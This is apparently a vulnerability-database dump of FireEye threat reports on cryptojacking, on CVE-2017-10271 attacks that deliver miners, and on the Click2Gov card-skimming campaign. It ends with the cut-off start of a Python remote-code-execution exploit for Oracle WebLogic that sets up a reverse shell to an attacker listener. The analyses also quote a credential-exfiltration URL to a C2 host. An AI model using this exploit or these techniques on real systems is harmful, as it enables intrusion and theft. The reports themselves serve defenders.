code.\n\n#### Detection Avoidance Methods\n\nAnother trend worth noting is the use of proxies to avoid detection. 
The implementation of mining proxies presents an attractive option for cyber criminals because it allows them to avoid developer and commission fees of 30 percent or more. Avoiding the use of common cryptojacking services such as Coinhive, Crypto-Loot, and Deepminer, and instead hosting cryptojacking scripts on actor-controlled infrastructure, can circumvent many of the common strategies taken to block this activity via domain or file name blacklisting.\n\nIn March 2018, [Bleeping Computer reported](<https://www.bleepingcomputer.com/news/security/in-browser-cryptojacking-is-getting-harder-to-detect/>) on the use of cryptojacking proxy servers and determined that as the use of cryptojacking proxy services increases, the effectiveness of ad blockers and browser extensions that rely on blacklists decreases significantly.\n\nSeveral mining proxy tools can be found on GitHub, such as the [XMRig Proxy](<https://github.com/xmrig/xmrig-proxy>) tool, which greatly reduces the number of active pool connections, and the [CoinHive Stratum Mining Proxy](<https://github.com/x25/coinhive-stratum-mining-proxy>), which uses Coinhive\u2019s JavaScript mining library to provide an alternative to using official Coinhive scripts and infrastructure.\n\nIn addition to using proxies, actors may also establish their own self-hosted miner apps, either on private servers or cloud-based servers that support Node.js. Although private servers may provide some benefit over using a commercial mining service, they are still subject to easy blacklisting and require more operational effort to maintain. 
According to [Sucuri researchers](<https://blog.sucuri.net/2018/01/malicious-cryptominers-from-github-part-2.html>), cloud-based servers provide many benefits to actors looking to host their own mining applications, including:\n\n * Available free or at low cost\n * No maintenance, just upload the crypto-miner app\n * Harder to block as blacklisting the host address could potentially impact access to legitimate services\n * Resilient to permanent takedown as new hosting accounts can more easily be created using disposable accounts\n\nThe combination of proxies and crypto-miners hosted on actor-controlled cloud infrastructure presents a significant hurdle to security professionals, as both make cryptojacking operations more difficult to detect and take down.\n\n#### Mining Victim Demographics\n\nBased on data from FireEye detection technologies, the detection of cryptocurrency miner malware has increased significantly since the beginning of 2018 (Figure 10), with the most popular mining pools being minergate and nanopool (Figure 11), and the most heavily affected country being the U.S. (Figure 12). 
Consistent with [other reporting](<https://www.bleepingcomputer.com/news/cryptocurrency/students-mining-cryptocurrencies-are-clogging-up-university-networks/>), the education sector remains most affected, likely due to more relaxed security controls across university networks and students taking advantage of free electricity to mine cryptocurrencies (Figure 13).\n\n \nFigure 10: Cryptocurrency miner detection activity per month\n\n \nFigure 11: Commonly observed pools and associated ports\n\n \nFigure 12: Top 10 affected countries\n\n \nFigure 13: Top five affected industries\n\n \nFigure 14: Top affected industries by country\n\n#### Mitigation Techniques\n\n##### Unencrypted Stratum Sessions\n\nAccording to security researchers at Cato Networks, in order for a miner to participate in pool mining, the infected machine will have to run native or JavaScript-based code that uses the Stratum protocol over TCP or HTTP/S. The Stratum protocol uses a publish/subscribe architecture where clients will send subscription requests to join a pool and servers will send messages (publish) to their subscribed clients. These messages are simple, readable, JSON-RPC messages. Subscription requests will include the following entities: id, method, and params (Figure 15). A deep packet inspection (DPI) engine can be configured to look for these parameters in order to block Stratum over unencrypted TCP.\n\n \nFigure 15: Stratum subscription request parameters\n\n##### Encrypted Stratum Sessions\n\nIn the case of JavaScript-based miners running Stratum over HTTPS, detection is more difficult for DPI engines that do not decrypt TLS traffic. To mitigate encrypted mining traffic on a network, organizations may blacklist the IP addresses and domains of popular mining pools. 
However, the downside to this is identifying and updating the blacklist, as locating a reliable and continually updated list of popular mining pools can prove difficult and time-consuming.\n\n##### Browser-Based Sessions\n\nIdentifying and detecting websites that have embedded coin mining code can be difficult since not all coin mining scripts are authorized by website publishers (as in the case of a compromised website). Further, in cases where coin mining scripts were authorized by a website owner, they are not always clearly communicated to site visitors.\n\nAs defenses evolve to prevent unauthorized coin mining activities, so will the techniques used by actors; however, blocking some of the most common indicators that we have observed to date may be effective in combating a significant amount of the CPU-draining mining activities that customers have reported. Generic detection strategies for browser-based cryptocurrency mining include:\n\n * Blocking domains known to have hosted coin mining scripts\n * Blocking the websites of known mining projects, such as Coinhive\n * Blocking scripts altogether\n * Using an ad-blocker or coin mining-specific browser add-ons\n * Detecting commonly used naming conventions\n * Alerting and blocking traffic destined for known popular mining pools\n\nSome of these detection strategies may also be of use in blocking some mining functionality included in existing financial malware as well as mining-specific malware families.\n\nIt is important to note that JavaScript used in browser-based cryptojacking activity cannot access files on disk. However, if a host has inadvertently navigated to a website hosting mining scripts, we recommend purging cache and other browser data.\n\n#### Outlook\n\nIn underground communities and marketplaces there has been significant interest in cryptojacking operations, and numerous campaigns have been observed and reported by security researchers. 
These developments demonstrate the continued upward trend of threat actors conducting cryptocurrency mining operations, and we expect this focus to continue throughout 2018. Notably, malicious cryptocurrency mining may be seen as preferable due to the perception that it does not attract as much attention from law enforcement as compared to other forms of fraud or theft. Further, victims may not realize their computer is infected beyond a slowdown in system performance.\n\nDue to its inherent privacy-focused features and CPU-mining profitability, Monero has become one of the most attractive cryptocurrency options for cyber criminals. We believe that it will continue to be threat actors' primary cryptocurrency of choice, so long as the Monero blockchain maintains privacy-focused standards and is ASIC-resistant. If in the future the Monero protocol ever downgrades its security and privacy-focused features, then we assess with high confidence that threat actors will move to use another privacy-focused coin as an alternative.\n\nBecause of the anonymity associated with the Monero cryptocurrency and electronic wallets, as well as the availability of numerous cryptocurrency exchanges and tumblers, attribution of malicious cryptocurrency mining is very challenging for authorities, and malicious actors behind such operations typically remain unidentified. 
Threat actors will undoubtedly continue to demonstrate high interest in malicious cryptomining so long as it remains profitable and relatively low risk.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-07-18T10:00:00", "type": "fireeye", "title": "How the Rise of Cryptocurrencies Is Shaping the Cyber Crime Landscape: The Growth of Miners", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0099", "CVE-2017-10271"], "modified": "2018-07-18T10:00:00", "id": "FIREEYE:2473273CA0F291BCEBB5F99AA3E4F256", "href": "https://www.fireeye.com/blog/threat-research/2018/07/cryptocurrencies-cyber-crime-growth-of-miners.html", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-11-04T00:24:47", "description": "#### Introduction\n\nFireEye researchers recently observed threat actors abusing CVE-2017-10271 to deliver various cryptocurrency miners.\n\nCVE-2017-10271 is a known input validation vulnerability that exists in the WebLogic Server Security Service (WLS Security) in Oracle WebLogic Server versions 12.2.1.2.0 and prior, and attackers can exploit it to remotely execute arbitrary code. 
Oracle released a [Critical Patch Update](<http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html>) that reportedly fixes this vulnerability. Users who failed to patch their systems may find themselves mining cryptocurrency for threat actors.\n\nFireEye observed a high volume of activity associated with the exploitation of CVE-2017-10271 following the public posting of proof of concept code in December 2017. Attackers then leveraged this vulnerability to download cryptocurrency miners in victim environments.\n\nWe saw evidence of organizations located in various countries \u2013 including the United States, Australia, Hong Kong, United Kingdom, India, Malaysia, and Spain, as well as those from nearly every industry vertical \u2013 being impacted by this activity. Actors involved in cryptocurrency mining operations mainly exploit opportunistic targets rather than specific organizations. This coupled with the diversity of organizations potentially affected by this activity suggests that the external targeting calculus of these attacks is indiscriminate in nature.\n\nThe recent cryptocurrency boom has resulted in a growing number of operations \u2013 employing diverse tactics \u2013 aimed at stealing cryptocurrencies. 
The idea that these cryptocurrency mining operations are less risky, along with the potentially nice profits, could lead cyber criminals to begin shifting away from ransomware campaigns.\n\n#### Tactic #1: Delivering the miner directly to a vulnerable server\n\nSome tactics we've observed involve exploiting CVE-2017-10271, leveraging PowerShell to download the miner directly onto the victim\u2019s system (Figure 1), and executing it using ShellExecute().\n\n \nFigure 1: Downloading the payload directly\n\n#### Tactic #2: Utilizing PowerShell scripts to deliver the miner\n\nOther tactics involve the exploit delivering a PowerShell script, instead of downloading the executable directly (Figure 2).\n\n \nFigure 2: Exploit delivering PowerShell script\n\nThis script has the following functionalities:\n\n * **Downloading miners from remote servers**\n\n \nFigure 3: Downloading cryptominers\n\nAs shown in Figure 3, the .ps1 script tries to download the payload from the remote server to a vulnerable server.\n\n * **Creating scheduled tasks for persistence**\n\n \nFigure 4: Creation of scheduled task\n\n * **Deleting scheduled tasks of other known cryptominers**\n\n \nFigure 5: Deletion of scheduled tasks related to other miners\n\nIn Figure 4, the cryptominer creates a scheduled task with name \u201c_Update service for Oracle products1_\u201d. In Figure 5, a different variant deletes this task and other similar tasks after creating its own, \u201c_Update service for Oracle productsa_\u201d. 
\n\nFrom this, it\u2019s quite clear that different attackers are fighting over the resources available in the system.\n\n * **Killing processes matching certain strings associated with other cryptominers**\n\n \nFigure 6: Terminating processes directly\n\n \nFigure 7: Terminating processes matching certain strings\n\nSimilar to scheduled task deletion, certain known mining processes are also terminated (Figure 6 and Figure 7).\n\n * **Connects to mining pools with wallet key**\n\n \nFigure 8: Connection to mining pools\n\nThe miner is then executed with different flags to connect to mining pools (Figure 8). Some of the other observed flags are: -a for algorithm, -k for keepalive to prevent timeout, -o for URL of mining server, -u for wallet key, -p for password of mining server, and -t for limiting the number of miner threads.\n\n * **Limiting CPU usage to avoid suspicion**\n\n \nFigure 9: Limiting CPU Usage\n\nTo avoid suspicion, some attackers are limiting the CPU usage of the miner (Figure 9).\n\n#### Tactic #3: Lateral movement across Windows environments using Mimikatz and EternalBlue\n\nSome tactics involve spreading laterally across a victim\u2019s environment using dumped Windows credentials and the [EternalBlue](<https://www.fireeye.com/blog/threat-research/2017/05/smb-exploited-wannacry-use-of-eternalblue.html>) vulnerability ([CVE-2017-0144](<https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010>)).\n\nThe malware checks whether it\u2019s running on a 32-bit or 64-bit system to determine which PowerShell script to grab from the command and control (C2) server. It looks at every network adapter, aggregating all destination IPs of established non-loopback network connections. Every IP address is then tested with extracted credentials and a credential-based execution of PowerShell is attempted that downloads and executes the malware from the C2 server on the target machine. 
This variant maintains persistence via WMI (Windows Management Instrumentation).\n\nThe malware also has the capability to perform a [Pass-the-Hash](<https://en.wikipedia.org/wiki/Pass_the_hash>) attack with the NTLM information derived from Mimikatz in order to download and execute the malware in remote systems.\n\nAdditionally, the malware exfiltrates stolen credentials to the attacker via an HTTP GET request to: 'http://<C2>:8000/api.php?data=<credential data>'.\n\nIf the lateral movement with credentials fails, then the malware uses the PingCastle MS17-010 scanner (PingCastle is a French Active Directory security tool) to scan that particular host to determine if it\u2019s vulnerable to EternalBlue, and uses it to spread to that host.\n\nAfter all network-derived IPs have been processed, the malware generates random IPs and uses the same combination of PingCastle and EternalBlue to spread to those hosts.\n\n#### Tactic #4: Scenarios observed in Linux OS\n\nWe\u2019ve also observed this vulnerability being exploited to deliver shell scripts (Figure 10) that have functionality similar to the PowerShell scripts.\n\n \nFigure 10: Delivery of shell scripts\n\nThe shell script performs the following activities:\n\n * **Attempts to kill already running cryptominers**\n\n \nFigure 11: Terminating processes matching certain strings\n\n * **Downloads and executes cryptominer malware**\n\n \nFigure 12: Downloading CryptoMiner\n\n * **Creates a cron job to maintain persistence**\n\n \nFigure 13: Cron job for persistence\n\n * **Tries to kill other potential miners to hog the CPU usage**\n\n \nFigure 14: Terminating other potential miners\n\nThe function shown in Figure 14 is used to find processes that have high CPU usage and terminate them. This terminates other potential miners and maximizes the utilization of resources.\n\n#### Conclusion\n\nUse of cryptocurrency mining malware is a popular tactic leveraged by financially-motivated cyber criminals to make money from victims. 
We\u2019ve observed one threat actor mining around 1 XMR/day, demonstrating the potential profitability and reason behind the recent rise in such attacks. Additionally, these operations may be perceived as less risky when compared to ransomware operations, since victims may not even know the activity is occurring beyond the slowdown in system performance.\n\nNotably, cryptocurrency mining malware is being distributed using various tactics, typically in an opportunistic and indiscriminate manner so that cyber criminals can maximize their outreach and profits.\n\nFireEye HX, being a behavior-based solution, is not affected by cryptominer tricks. FireEye HX detects these threats at the initial level of the attack cycle, when the attackers attempt to deliver the first stage payload or when the miner tries to connect to mining pools.\n\nAt the time of writing, FireEye HX detects this activity with the following indicators:\n\n| Detection Name |\n| --- |\n| POWERSHELL DOWNLOADER (METHODOLOGY) |\n| MONERO MINER (METHODOLOGY) |\n| MIMIKATZ (CREDENTIAL STEALER) |\n\n#### Indicators of Compromise\n\n| MD5 | Name |\n| --- | --- |\n| 3421A769308D39D4E9C7E8CAECAF7FC4 | cranberry.exe/logic.exe |\n| B3A831BFA590274902C77B6C7D4C31AE | xmrig.exe/yam.exe |\n| 26404FEDE71F3F713175A3A3CEBC619B | 1.ps1 |\n| D3D10FAA69A10AC754E3B7DDE9178C22 | 2.ps1 |\n| 9C91B5CF6ECED54ABB82D1050C5893F2 | info3.ps1 |\n| 3AAD3FABF29F9DF65DCBD0F308FF0FA8 | info6.ps1 |\n| 933633F2ACFC5909C83F5C73B6FC97CC | lower.css |\n| B47DAF937897043745DF81F32B9D7565 | lib.css |\n| 3542AC729035C0F3DB186DDF2178B6A0 | bootstrap.css |\n\nThanks to Dileep Kumar Jallepalli and Charles Carmakal for their help in the analysis.\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", 
"integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-02-15T16:30:00", "type": "fireeye", "title": "CVE-2017-10271 Used to Deliver CryptoMiners: An Overview of Techniques\nUsed Post-Exploitation and Pre-Mining", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0144", "CVE-2017-10271"], "modified": "2018-02-15T16:30:00", "id": "FIREEYE:57B0F10A16E18DC672833B1812005B76", "href": "https://www.fireeye.com/blog/threat-research/2018/02/cve-2017-10271-used-to-deliver-cryptominers.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-10-11T20:17:40", "description": "FireEye has been tracking a campaign this year targeting web payment portals that involves on-premise installations of Click2Gov. [Click2Gov](<https://www.superion.com/public-administration/click2gov/>) is a web-based, interactive self-service bill-pay software solution developed by Superion. It includes various modules that allow users to pay bills associated with various local government services such as utilities, building permits, and business licenses. In October 2017, Superion released a statement [confirming suspicious activity](<https://www.superion.com/ceo-response-to-reported-breach/>) had affected a small number of customers. 
In mid-June 2018, numerous media reports referenced at least seven Click2Gov customers that were possibly affected by this campaign. Since June 2018, additional victims have been identified in public reporting. A review of public statements by these organizations appear to confirm compromises associated with Click2Gov.\n\nOn June 15, 2018, Superion released a statement describing their [proactive notification to affected customers](<https://www.superion.com/click2gov-update/>), work with a third-party forensic firm (not Mandiant), and deployment of patches to Click2Gov software and a related third-party component. Superion then concluded that there was no evidence that it is unsafe to make payments utilizing Click2Gov on hosted or secure on-premise networks with recommended patches and configurations.\n\nMandiant forensically analyzed compromised systems and recovered malware associated with this campaign, which provided insight into the capabilities of this new attacker. As of this publication, the discussed malware families have very low detection rates by antivirus solutions, as reported by VirusTotal.\n\n#### Attack Overview\n\nThe first stage of the campaign typically started with the attacker uploading a SJavaWebManage webshell to facilitate interaction with the compromised Click2Gov webserver. Through interaction with the webshell, the attacker enabled debug mode in a Click2Gov configuration file causing the application to write payment card information to plaintext log files. The attacker then uploaded a tool, which FireEye refers to as FIREALARM, to the webserver to parse these log files, retrieve the payment card information, and remove all log entries not containing error messages. Additionally, the attacker used another tool, SPOTLIGHT, to intercept payment card information from HTTP network traffic. 
The remainder of this blog post dives into the details of the attacker's tactics, techniques, and procedures (TTPs).\n\n#### SJavaWebManage Webshell\n\nIt is not known how the attacker compromised the Click2Gov webservers, but they likely employed an exploit targeting Oracle Web Logic such as CVE-2017-3248, CVE-2017-3506, or CVE-2017-10271, which would provide the capability to upload arbitrary files or achieve remote access. After exploiting the vulnerability, the attacker uploaded a variant of the [publicly available JavaServer Pages (JSP) webshell SJavaWebManage](<https://github.com/tennc/webshell/blob/master/jsp/SJavaWebManageV1.4.jsp>) to maintain persistence on the webserver. SJavaWebManage requires authentication to access four specific pages, as depicted in Figure 1, and will execute commands in the context of the Tomcat service, by default the Local System account.\n\n \nFigure 1: Sample SJavaWebManage interface\n\n * **EnvsInfo**: Displays information about the Java runtime, Tomcat version, and other information about the environment.\n * **FileManager**: Provides the ability to browse, upload, download (original or compressed), edit, delete, and timestomp files.\n * **CMDS**: Executes a command using cmd.exe (or /bin/sh if on a non-Windows system) and returns the response.\n * **DBManage**: Interacts with a database by connecting, displaying database metadata, and executing SQL commands.\n\nThe differences between the publicly available webshell and this variant include variable names that were changed to possibly inhibit detection, Chinese characters that were changed to English, references to SjavaWebManage that were deleted, and code to handle updates to the webshell being removed. Additionally, the variant identified during the campaign investigation included the ability to manipulate file timestamps on the server. This functionality is not present in the public version. 
The SJavaWebManage webshell provided the attacker a sufficient interface to easily interact with and manipulate the compromised hosts.\n\nThe attacker would then restart a module in DEBUG mode using the SJavaWebManage CMDS page after editing a Click2Gov XML configuration file. With the DEBUG logging option enabled, the Click2Gov module would log plaintext payment card data to the Click2Gov log files with naming convention Click2GovCX.logYYYY-MM-DD.\n\n#### FIREALARM\n\nUsing interactive commands within the webshell, the attacker uploaded and executed a datamining utility FireEye tracks as FIREALARM, which parses through Click2Gov log files to retrieve payment card data, format the data, and print it to the console.\n\nFIREALARM is a command line tool written in C/C++ that accepts three numbers as arguments; Year, Month, and Day, represented in a sample command line as: evil.exe 2018 09 01. From this example, FIREALARM would attempt to open and parse logs starting on 2018-09-01 until the present day. If the log files exists, FIREALARM copies the MAC (Modified, Accessed, Created) times to later timestomp the corresponding file back to original times. Each log file is then read line by line and parsed. FIREALARM searches each line for the following contents and parses the data:\n\n * medium.accountNumber\n * medium.cvv2\n * medium.expirationDate.year\n * medium.expirationDate.month\n * medium.firstName\n * medium.lastName\n * medium.middleInitial\n * medium.contact.address1\n * medium.contact.address2\n * medium.contact.city\n * medium.contact.state\n * medium.contact.zip.code\n\nThis data is formatted and printed to the console. The malware also searches for lines that contain the text ERROR -. If this string is found, the utility stores the contents in a temporary file named %WINDIR%\\temp\\THN1080.tmp. 
After searching every line in the Click2GovCX log file, the temporary file THN1080.tmp is copied to replace the respective Click2GovCX log file and the timestamps are replaced to the original, copied timestamps. The result is that FIREALARM prints payment card information to the console and removes the payment card data from each Click2GovCX log file, leaving only the error messages. Finally, the THN1080.tmp temporary file is deleted. This process is depicted in Figure 2.\n\n \nFigure 2: FIREALARM workflow\n\n 1. Attacker traverses Tor or other proxy and authenticates to SjavaWebManage.\n 2. Attacker launches cmd prompt via webshell.\n 3. Attacker runs FIREALARM with parameters.\n 4. FIREALARM verifies and iterates through log files, copies MAC times, parses and prints payment card data to the console, copies error messages to THN1080.tmp, overwrites the original log file and timestomps with orginal times.\n 5. THN1080.tmp is deleted.\n\n#### SPOTLIGHT\n\nLater, during attacker access to the compromised system, the attacker used the webshell to upload a network sniffer FireEye tracks as SPOTLIGHT. This tool offered the attacker better persistence to the host and continuous collection of payment card data, ensuring the mined data would not be lost if Click2GovCX log files were deleted by an administrator. SPOTLIGHT is also written in C/C++ and may be installed by command line arguments or run as a service. When run as a service, its tasks include ensuring that two JSP files exist, and monitoring and logging network traffic for specific HTTP POST request contents.\n\nSPOTLIGHT accepts two command line arguments:\n\n * gplcsvc.exe -i Creates a new service named gplcsvc with the display name Group Policy Service\n * gplcsvc.exe -u Stops and deletes the service named gplcsvc\n\nUpon installation, SPOTLIGHT will monitor two paths on the infected host every hour:\n\n 1. C:\\bea\\c2gdomain\\applications\\Click2GovCX\\scripts\\validator.jsp\n 2. 
C:\\bea\\c2gdomain\\applications\\ePortalLocalService\\axis2-web\\RightFrame.jsp\n\nIf either file does not exist, the malware Base64 decodes an embedded SJavaWebManage webshell and writes the same file to either path. This is the same webshell installed by the attacker during the initial compromise.\n\nAdditionally, SPOTLIGHT starts a socket listener to inspect IPv4 TCP traffic on port 80 and 7101. According to a Superion installation checklist, TCP port 7101 is used for application resolution from the internal network to the Click2Gov webserver. As long as the connection contents do not begin with GET /, the malware begins saving a buffer of received packets. The malware continues saving packet contents to an internal buffer until one of two conditions occurs \u2013 the buffer exceeds the size 102399 or the packet contents begin with the string POST /OnePoint/services/OnePointService. If either of these two conditions occur, the internal buffer data is searched for the following tags:\n\n * <op:AccountNum>\n * <op:CSC>\n * <op:ExpDate>\n * <op:FirstName>\n * <op:LastName>\n * <op:MInitial>\n * <op:Street1>\n * <op:Street2>\n * <op:City>\n * <op:State>\n * <op:PostalCode>\n\nThe contents between the tags are extracted and formatted with a `|`, which is used as a separator character. The formatted data is then Base64 encoded and appended to a log file at the hard-coded file path: c:\\windows\\temp\\opt.log. The attacker then used SJavaWebManage to exfiltrate the Base64 encoded log file containing payment card data. FireEye has not identified any manipulation of a compromised host\u2019s SSL configuration settings or redirection of SSL traffic to an unencrypted port. This process is depicted in Figure 3.\n\n \nFigure 3: SPOTLIGHT workflow\n\n 1. SPOTLIGHT verifies webshell file on an hourly basis, writing SJavaWebManage if missing.\n 2. SPOTLIGHT inspects IPv4 TCP traffic on port 80 or 7101, saving a buffer of received packets.\n 3. 
A user accesses Click2Gov module to make a payment.\n 4. SPOTLIGHT parses packets for payment card data, Base64 encodes and writes to opt.log.\n 5. Attacker traverses Tor or other proxy and authenticates to SJavaWebManage and launches File Manager.\n 6. Attacker exfiltrates opt.log file.\n\n#### Attribution\n\nBased on the available campaign information, the attacker doesn\u2019t align with any financially motivated threat groups currently tracked by FireEye. The attacker\u2019s understanding of the Click2Gov host requirements, process logging details, payment card fields, and internal communications protocols demonstrates an advanced knowledge of the Click2Gov application. Given the manner in which underground forums and marketplaces function, it is possible that tool development could have been contracted to third parties and remote access to compromised systems could have been achieved by one entity and sold to another. There is much left to be uncovered about this attacker. \n\nWhile it is also possible the attack was conducted by a single individual, FireEye assesses, with moderate confidence, that a team was likely involved in this campaign based on the following requisite skillsets:\n\n * Ability to locate Click2Gov installations and identify exploitable vulnerabilities.\n * Ability to craft or reuse an exploit to penetrate the target organization\u2019s network environment.\n * Basic JSP programming skills.\n * Advanced knowledge of Click2Gov payment processes and software sufficient to develop moderately sophisticated malware.\n * Proficient C/C++ programming skills.\n * General awareness of operational security.\n * Ability to monetize stolen payment card information.\n\n#### Conclusion\n\nIn addition to a regimented patch management program, FireEye recommends that organizations consider implementing a file integrity monitoring solution to monitor the static content and code that generates dynamic content on e-commerce webservers for unexpected 
modifications. Another best practice is to ensure any web service accounts run at least privilege.\n\nAlthough the TTPs observed in the attack lifecycle are generally consistent with other financially motivated attack groups tracked by FireEye, this attacker demonstrated ingenuity in crafting malware exploiting Click2Gov installations, achieving moderate success. Although it may transpire in a new form, FireEye anticipates this threat actor will continue to conduct interactive and financially motivated attacks.\n\n#### Detection\n\nFireEye\u2019s Adversary Pursuit Team from Technical Operations & Reverse Engineering \u2013 Advanced Practices works jointly with Mandiant Consulting and FireEye Labs Advanced Reverse Engineering (FLARE) during investigations assessed as directly supporting a nation-state or financial gains intrusions targeting organizations and involving interactive and focused efforts. The synergy of this relationship allows FireEye to rapidly identify new activity associated with currently tracked threat groups, as well as new threat actors, advanced malware, or TTPs leveraged by threat groups, and quickly mitigate them across the FireEye enterprise.\n\nFireEye detects the malware documented in this blog post as the following:\n\n * FE_Tool_Win32_FIREALARM_1\n * FE_Trojan_Win64_SPOTLIGHT_1\n * FE_Webshell_JSP_SJavaWebManage_1\n * Webshell.JSP.SJavaWebManage\n\n#### Indicators of Compromise (MD5)\n\n_SJavaWebManage_\n\n * 91eaca79943c972cb2ca7ee0e462922c \n * 80f8a487314a9573ab7f9cb232ab1642 \n * cc155b8cd261a6ed33f264e710ce300e (Publicly available version)\n\n_FIREALARM_\n\n * e2c2d8bad36ac3e446797c485ce8b394\n\n_SPOTLIGHT_\n\n * d70068de37d39a7a01699c99cdb7fa2b\n * 1300d1f87b73d953e20e25fdf8373c85\n * 3bca4c659138e769157f49942824b61f\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", 
"integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-09-19T10:00:00", "type": "fireeye", "title": "Click It Up: Targeting Local Government Payment Portals", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-3506", "CVE-2017-3248", "CVE-2017-10271"], "modified": "2018-09-19T10:00:00", "id": "FIREEYE:C097B41677EDE5F95DB4B84AD6726751", "href": "https://www.fireeye.com/blog/threat-research/2018/09/click-it-up-targeting-local-government-payment-portals.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "zdt": [{"lastseen": "2018-04-14T17:44:57", "description": "Exploit for multiple platform in category remote exploits", "cvss3": {}, "published": "2018-01-08T00:00:00", "type": "zdt", "title": "Oracle WebLogic < 10.3.6 - wls-wsat Component Deserialisation Remote Command Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-10271"], "modified": "2018-01-08T00:00:00", "id": "1337DAY-ID-29395", "href": "https://0day.today/exploit/description/29395", "sourceData": "#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n# Exploit Title: Weblogic wls-wsat Component Deserialization RCE\r\n# Date Authored: Jan 3, 2018\r\n# Date Announced: 10/19/2017\r\n# Exploit Author: Kevin Kirsche (d3c3pt10n)\r\n# Exploit Github: https://github.com/kkirsche/CVE-2017-10271\r\n# 
Exploit is based off of POC by Luffin from Github\r\n# https://github.com/Luffin/CVE-2017-10271\r\n# Vendor Homepage: http://www.oracle.com/technetwork/middleware/weblogic/overview/index.html\r\n# Version: 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0\r\n# Tested on: Oracle WebLogic 10.3.6.0.0 running on Oracle Linux 6.8 and Ubuntu 14.04.4 LTS\r\n# CVE: CVE-2017-10271\r\n# Usage: python exploit.py -l 10.10.10.10 -p 4444 -r http://will.bepwned.com:7001/\r\n# (Python 3) Example check listener: python3 -m http.server 4444\r\n# (Python 2) Example check listener: python -m SimpleHTTPServer 4444\r\n# (Netcat) Example exploit listener: nc -nlvp 4444\r\n \r\nfrom sys import exit\r\nfrom requests import post\r\nfrom argparse import ArgumentParser\r\nfrom random import choice\r\nfrom string import ascii_uppercase, ascii_lowercase, digits\r\nfrom xml.sax.saxutils import escape\r\n \r\nclass Exploit:\r\n \r\n def __init__(self, check, rhost, lhost, lport, windows):\r\n self.url = rhost if not rhost.endswith('/') else rhost.strip('/')\r\n self.lhost = lhost\r\n self.lport = lport\r\n self.check = check\r\n if windows:\r\n self.target = 'win'\r\n else:\r\n self.target = 'unix'\r\n \r\n if self.target == 'unix':\r\n # Unix reverse shell\r\n # You should also be able to instead use something from MSFVenom. 
